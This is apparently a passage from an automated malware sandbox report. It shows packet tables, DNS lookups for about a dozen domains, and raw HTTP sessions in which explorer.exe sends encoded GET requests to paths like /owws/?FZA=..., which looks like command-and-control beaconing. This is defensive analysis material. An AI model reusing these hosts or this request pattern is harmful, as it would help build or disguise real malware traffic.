                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Feb 23, 2021 08:57:44.081270933 CET4972980192.168.2.550.87.196.120
                                                                                      Feb 23, 2021 08:57:44.267616987 CET804972950.87.196.120192.168.2.5
                                                                                      Feb 23, 2021 08:57:44.267728090 CET4972980192.168.2.550.87.196.120
                                                                                      Feb 23, 2021 08:57:44.267937899 CET4972980192.168.2.550.87.196.120
                                                                                      Feb 23, 2021 08:57:44.452924967 CET804972950.87.196.120192.168.2.5
                                                                                      Feb 23, 2021 08:57:44.464051008 CET804972950.87.196.120192.168.2.5
                                                                                      Feb 23, 2021 08:57:44.464297056 CET804972950.87.196.120192.168.2.5
                                                                                      Feb 23, 2021 08:57:44.464313030 CET4972980192.168.2.550.87.196.120
                                                                                      Feb 23, 2021 08:57:44.464510918 CET4972980192.168.2.550.87.196.120
                                                                                      Feb 23, 2021 08:57:44.651365995 CET804972950.87.196.120192.168.2.5
                                                                                      Feb 23, 2021 08:57:50.103084087 CET4973080192.168.2.5170.106.171.56
                                                                                      Feb 23, 2021 08:57:50.306849957 CET8049730170.106.171.56192.168.2.5
                                                                                      Feb 23, 2021 08:57:50.307043076 CET4973080192.168.2.5170.106.171.56
                                                                                      Feb 23, 2021 08:57:50.307199955 CET4973080192.168.2.5170.106.171.56
                                                                                      Feb 23, 2021 08:57:50.510967970 CET8049730170.106.171.56192.168.2.5
                                                                                      Feb 23, 2021 08:57:50.513550997 CET8049730170.106.171.56192.168.2.5
                                                                                      Feb 23, 2021 08:57:50.513581991 CET8049730170.106.171.56192.168.2.5
                                                                                      Feb 23, 2021 08:57:50.513596058 CET8049730170.106.171.56192.168.2.5
                                                                                      Feb 23, 2021 08:57:50.513766050 CET4973080192.168.2.5170.106.171.56
                                                                                      Feb 23, 2021 08:57:50.513847113 CET4973080192.168.2.5170.106.171.56
                                                                                      Feb 23, 2021 08:57:50.516586065 CET4973080192.168.2.5170.106.171.56
                                                                                      Feb 23, 2021 08:57:50.720447063 CET8049730170.106.171.56192.168.2.5
                                                                                      Feb 23, 2021 08:57:55.594748020 CET4973180192.168.2.534.102.136.180
                                                                                      Feb 23, 2021 08:57:55.635528088 CET804973134.102.136.180192.168.2.5
                                                                                      Feb 23, 2021 08:57:55.635716915 CET4973180192.168.2.534.102.136.180
                                                                                      Feb 23, 2021 08:57:55.635871887 CET4973180192.168.2.534.102.136.180
                                                                                      Feb 23, 2021 08:57:55.676275969 CET804973134.102.136.180192.168.2.5
                                                                                      Feb 23, 2021 08:57:55.775059938 CET804973134.102.136.180192.168.2.5
                                                                                      Feb 23, 2021 08:57:55.775103092 CET804973134.102.136.180192.168.2.5
                                                                                      Feb 23, 2021 08:57:55.775355101 CET4973180192.168.2.534.102.136.180
                                                                                      Feb 23, 2021 08:57:55.775441885 CET4973180192.168.2.534.102.136.180
                                                                                      Feb 23, 2021 08:57:55.815941095 CET804973134.102.136.180192.168.2.5
                                                                                      Feb 23, 2021 08:58:01.040714025 CET4973280192.168.2.5156.240.32.114
                                                                                      Feb 23, 2021 08:58:01.260431051 CET8049732156.240.32.114192.168.2.5
                                                                                      Feb 23, 2021 08:58:01.264575005 CET4973280192.168.2.5156.240.32.114
                                                                                      Feb 23, 2021 08:58:01.264838934 CET4973280192.168.2.5156.240.32.114
                                                                                      Feb 23, 2021 08:58:01.483952999 CET8049732156.240.32.114192.168.2.5
                                                                                      Feb 23, 2021 08:58:01.486218929 CET8049732156.240.32.114192.168.2.5
                                                                                      Feb 23, 2021 08:58:01.486253023 CET8049732156.240.32.114192.168.2.5
                                                                                      Feb 23, 2021 08:58:01.486402988 CET4973280192.168.2.5156.240.32.114
                                                                                      Feb 23, 2021 08:58:01.486474991 CET4973280192.168.2.5156.240.32.114
                                                                                      Feb 23, 2021 08:58:01.705612898 CET8049732156.240.32.114192.168.2.5
                                                                                      Feb 23, 2021 08:58:06.594165087 CET4973480192.168.2.513.57.130.120
                                                                                      Feb 23, 2021 08:58:06.797530890 CET804973413.57.130.120192.168.2.5
                                                                                      Feb 23, 2021 08:58:06.797717094 CET4973480192.168.2.513.57.130.120
                                                                                      Feb 23, 2021 08:58:06.798021078 CET4973480192.168.2.513.57.130.120
                                                                                      Feb 23, 2021 08:58:07.001307964 CET804973413.57.130.120192.168.2.5
                                                                                      Feb 23, 2021 08:58:07.001431942 CET804973413.57.130.120192.168.2.5
                                                                                      Feb 23, 2021 08:58:07.001451015 CET804973413.57.130.120192.168.2.5
                                                                                      Feb 23, 2021 08:58:07.001702070 CET4973480192.168.2.513.57.130.120
                                                                                      Feb 23, 2021 08:58:07.001868963 CET4973480192.168.2.513.57.130.120
                                                                                      Feb 23, 2021 08:58:07.205092907 CET804973413.57.130.120192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.075892925 CET4973580192.168.2.554.85.86.211
                                                                                      Feb 23, 2021 08:58:12.203922987 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.204191923 CET4973580192.168.2.554.85.86.211
                                                                                      Feb 23, 2021 08:58:12.204418898 CET4973580192.168.2.554.85.86.211
                                                                                      Feb 23, 2021 08:58:12.338124037 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.338160992 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.338188887 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.338217020 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.338243961 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.338269949 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.338298082 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.338330984 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.338361025 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.338387966 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.338392019 CET4973580192.168.2.554.85.86.211
                                                                                      Feb 23, 2021 08:58:12.338432074 CET4973580192.168.2.554.85.86.211
                                                                                      Feb 23, 2021 08:58:12.338438988 CET4973580192.168.2.554.85.86.211
                                                                                      Feb 23, 2021 08:58:12.338443995 CET4973580192.168.2.554.85.86.211
                                                                                      Feb 23, 2021 08:58:12.465953112 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.465997934 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.466032982 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.466078043 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.466116905 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.466129065 CET4973580192.168.2.554.85.86.211
                                                                                      Feb 23, 2021 08:58:12.466150999 CET4973580192.168.2.554.85.86.211
                                                                                      Feb 23, 2021 08:58:12.466152906 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.466188908 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.466224909 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.466259003 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.466264963 CET4973580192.168.2.554.85.86.211
                                                                                      Feb 23, 2021 08:58:12.466269970 CET4973580192.168.2.554.85.86.211
                                                                                      Feb 23, 2021 08:58:12.466295004 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.466329098 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.466375113 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.466408968 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.466523886 CET4973580192.168.2.554.85.86.211
                                                                                      Feb 23, 2021 08:58:12.466530085 CET4973580192.168.2.554.85.86.211
                                                                                      Feb 23, 2021 08:58:12.466532946 CET4973580192.168.2.554.85.86.211
                                                                                      Feb 23, 2021 08:58:12.466696024 CET4973580192.168.2.554.85.86.211
                                                                                      Feb 23, 2021 08:58:12.593298912 CET804973554.85.86.211192.168.2.5
                                                                                      Feb 23, 2021 08:58:17.565337896 CET4973680192.168.2.534.90.54.238
                                                                                      Feb 23, 2021 08:58:17.613014936 CET804973634.90.54.238192.168.2.5
                                                                                      Feb 23, 2021 08:58:17.613121986 CET4973680192.168.2.534.90.54.238
                                                                                      Feb 23, 2021 08:58:17.613405943 CET4973680192.168.2.534.90.54.238
                                                                                      Feb 23, 2021 08:58:17.661071062 CET804973634.90.54.238192.168.2.5
                                                                                      Feb 23, 2021 08:58:17.661597013 CET804973634.90.54.238192.168.2.5
                                                                                      Feb 23, 2021 08:58:17.661609888 CET804973634.90.54.238192.168.2.5
                                                                                      Feb 23, 2021 08:58:17.661828995 CET4973680192.168.2.534.90.54.238

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Feb 23, 2021 08:56:35.955482960 CET5270453192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:36.007077932 CET53527048.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:56:36.239656925 CET5221253192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:36.291347027 CET53522128.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:56:36.403825045 CET5430253192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:36.452589035 CET53543028.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:56:36.565407038 CET5378453192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:36.614387989 CET53537848.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:56:37.193017960 CET6530753192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:37.244647980 CET53653078.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:56:37.477365017 CET6434453192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:37.526056051 CET53643448.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:56:38.939780951 CET6206053192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:38.988445044 CET53620608.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:56:39.876188040 CET6180553192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:39.924889088 CET53618058.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:56:40.971841097 CET5479553192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:41.029036999 CET53547958.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:56:41.937917948 CET4955753192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:41.987518072 CET53495578.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:56:43.116148949 CET6173353192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:43.142633915 CET6544753192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:43.174614906 CET53617338.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:56:43.207350969 CET53654478.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:56:44.577920914 CET5244153192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:44.626645088 CET53524418.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:56:45.774638891 CET6217653192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:45.823354006 CET53621768.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:56:47.020380974 CET5959653192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:47.072390079 CET53595968.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:56:48.178019047 CET6529653192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:48.229912043 CET53652968.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:56:49.320511103 CET6318353192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:49.369152069 CET53631838.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:56:50.716367960 CET6015153192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:56:50.768454075 CET53601518.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:57:04.596348047 CET5696953192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:57:04.658051014 CET53569698.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:57:15.954601049 CET5516153192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:57:16.007508039 CET53551618.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:57:30.171575069 CET5475753192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:57:30.234869957 CET53547578.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:57:32.386890888 CET4999253192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:57:32.399264097 CET6007553192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:57:32.435621023 CET53499928.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:57:32.457739115 CET53600758.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:57:32.559315920 CET5501653192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:57:32.608166933 CET53550168.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:57:42.624135971 CET6434553192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:57:43.626622915 CET6434553192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:57:43.685693026 CET53643458.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:57:43.926274061 CET5712853192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:57:44.073349953 CET53571288.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:57:49.474215031 CET5479153192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:57:50.102022886 CET53547918.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:57:55.522838116 CET5046353192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:57:55.593292952 CET53504638.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:58:00.814778090 CET5039453192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:58:01.037513971 CET53503948.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:58:02.300045967 CET5853053192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:58:02.370999098 CET53585308.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:58:06.523142099 CET5381353192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:58:06.592775106 CET53538138.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:58:12.012454987 CET6373253192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:58:12.074486971 CET53637328.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:58:17.494049072 CET5734453192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:58:17.563788891 CET53573448.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:58:22.681061029 CET5445053192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:58:22.772489071 CET53544508.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:58:27.961551905 CET5926153192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:58:28.023690939 CET53592618.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:58:33.085443974 CET5715153192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:58:33.297590971 CET53571518.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:58:54.751465082 CET5941353192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:58:54.816216946 CET53594138.8.8.8192.168.2.5
                                                                                      Feb 23, 2021 08:58:59.339791059 CET6051653192.168.2.58.8.8.8
                                                                                      Feb 23, 2021 08:58:59.422525883 CET53605168.8.8.8192.168.2.5

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      Feb 23, 2021 08:57:43.926274061 CET192.168.2.58.8.8.80x14bdStandard query (0)www.abaplants.comA (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:57:49.474215031 CET192.168.2.58.8.8.80x349Standard query (0)www.cyjulebu.comA (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:57:55.522838116 CET192.168.2.58.8.8.80x25e1Standard query (0)www.denisekohli.comA (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:00.814778090 CET192.168.2.58.8.8.80x6f16Standard query (0)www.hostsnc.comA (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:06.523142099 CET192.168.2.58.8.8.80xadb4Standard query (0)www.assemble-4u.comA (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:12.012454987 CET192.168.2.58.8.8.80x756cStandard query (0)www.raphaelyejesiel.comA (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:17.494049072 CET192.168.2.58.8.8.80x4002Standard query (0)www.your-new-body-plan.comA (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:22.681061029 CET192.168.2.58.8.8.80x6611Standard query (0)www.softwaresreports.infoA (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:27.961551905 CET192.168.2.58.8.8.80x1d8bStandard query (0)www.gdzas08.cloudA (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:33.085443974 CET192.168.2.58.8.8.80x90d5Standard query (0)www.athomecp.comA (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:54.751465082 CET192.168.2.58.8.8.80x5ac6Standard query (0)www.athomecp.comA (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:59.339791059 CET192.168.2.58.8.8.80x70beStandard query (0)www.shamansmoke.comA (IP address)IN (0x0001)

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      Feb 23, 2021 08:57:44.073349953 CET8.8.8.8192.168.2.50x14bdNo error (0)www.abaplants.comabaplants.comCNAME (Canonical name)IN (0x0001)
                                                                                      Feb 23, 2021 08:57:44.073349953 CET8.8.8.8192.168.2.50x14bdNo error (0)abaplants.com50.87.196.120A (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:57:50.102022886 CET8.8.8.8192.168.2.50x349No error (0)www.cyjulebu.comjinrifresh.web7.cname-cdn.comCNAME (Canonical name)IN (0x0001)
                                                                                      Feb 23, 2021 08:57:50.102022886 CET8.8.8.8192.168.2.50x349No error (0)jinrifresh.web7.cname-cdn.comal27.cname-url.comCNAME (Canonical name)IN (0x0001)
                                                                                      Feb 23, 2021 08:57:50.102022886 CET8.8.8.8192.168.2.50x349No error (0)al27.cname-url.com104.233.225.185.cname-url.comCNAME (Canonical name)IN (0x0001)
                                                                                      Feb 23, 2021 08:57:50.102022886 CET8.8.8.8192.168.2.50x349No error (0)104.233.225.185.cname-url.com170.106.171.56A (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:57:55.593292952 CET8.8.8.8192.168.2.50x25e1No error (0)www.denisekohli.comdenisekohli.comCNAME (Canonical name)IN (0x0001)
                                                                                      Feb 23, 2021 08:57:55.593292952 CET8.8.8.8192.168.2.50x25e1No error (0)denisekohli.com34.102.136.180A (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:01.037513971 CET8.8.8.8192.168.2.50x6f16No error (0)www.hostsnc.com156.240.32.114A (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:06.592775106 CET8.8.8.8192.168.2.50xadb4No error (0)www.assemble-4u.comassemble-4u.comCNAME (Canonical name)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:06.592775106 CET8.8.8.8192.168.2.50xadb4No error (0)assemble-4u.com13.57.130.120A (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:12.074486971 CET8.8.8.8192.168.2.50x756cNo error (0)www.raphaelyejesiel.com54.85.86.211A (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:17.563788891 CET8.8.8.8192.168.2.50x4002No error (0)www.your-new-body-plan.com34.90.54.238A (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:22.772489071 CET8.8.8.8192.168.2.50x6611No error (0)www.softwaresreports.infosoftwaresreports.infoCNAME (Canonical name)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:22.772489071 CET8.8.8.8192.168.2.50x6611No error (0)softwaresreports.info34.102.136.180A (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:28.023690939 CET8.8.8.8192.168.2.50x1d8bName error (3)www.gdzas08.cloudnonenoneA (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:33.297590971 CET8.8.8.8192.168.2.50x90d5No error (0)www.athomecp.com154.91.61.105A (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:54.816216946 CET8.8.8.8192.168.2.50x5ac6No error (0)www.athomecp.com154.91.61.105A (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:59.422525883 CET8.8.8.8192.168.2.50x70beNo error (0)www.shamansmoke.comshaman-smoke.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:59.422525883 CET8.8.8.8192.168.2.50x70beNo error (0)shaman-smoke.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                      Feb 23, 2021 08:58:59.422525883 CET8.8.8.8192.168.2.50x70beNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • www.abaplants.com
                                                                                      • www.cyjulebu.com
                                                                                      • www.denisekohli.com
                                                                                      • www.hostsnc.com
                                                                                      • www.assemble-4u.com
                                                                                      • www.raphaelyejesiel.com
                                                                                      • www.your-new-body-plan.com
                                                                                      • www.softwaresreports.info

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.54972950.87.196.12080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Feb 23, 2021 08:57:44.267937899 CET3076OUTGET /owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src HTTP/1.1
                                                                                      Host: www.abaplants.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Feb 23, 2021 08:57:44.464051008 CET4548INHTTP/1.1 500 Internal Server Error
                                                                                      Date: Tue, 23 Feb 2021 07:57:44 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 685
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 61 62 61 70 6c 61 6e 74 73 2e 61 62 61 62 65 61 75 74 79 74 72 61 69 6e 69 6e 67 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@abaplants.ababeautytraining.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.549730170.106.171.5680C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Feb 23, 2021 08:57:50.307199955 CET5447OUTGET /owws/?FZA=LNtcZ4o3RSbiM3q1XP5+3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP&GzrX=Bxo0src HTTP/1.1
                                                                                      Host: www.cyjulebu.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Feb 23, 2021 08:57:50.513550997 CET5449INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Tue, 23 Feb 2021 07:57:48 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 1039
                                                                                      Connection: close
                                                                                      Set-Cookie: security_session_verify=9ebc6a29fa9e7c317eed3150247f3800; expires=Fri, 26-Feb-21 15:57:48 GMT; path=/; HttpOnly
                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 6e 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6c 6f 73 65 22 2f 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 73 74 72 69 6e 67 54 6f 48 65 78 28 73 74 72 29 7b 76 61 72 20 76 61 6c 3d 22 22 3b 66 6f 72 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 73 74 72 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 7b 69 66 28 76 61 6c 20 3d 3d 20 22 22 29 76 61 6c 20 3d 20 73 74 72 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 65 6c 73 65 20 76 61 6c 20 2b 3d 20 73 74 72 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 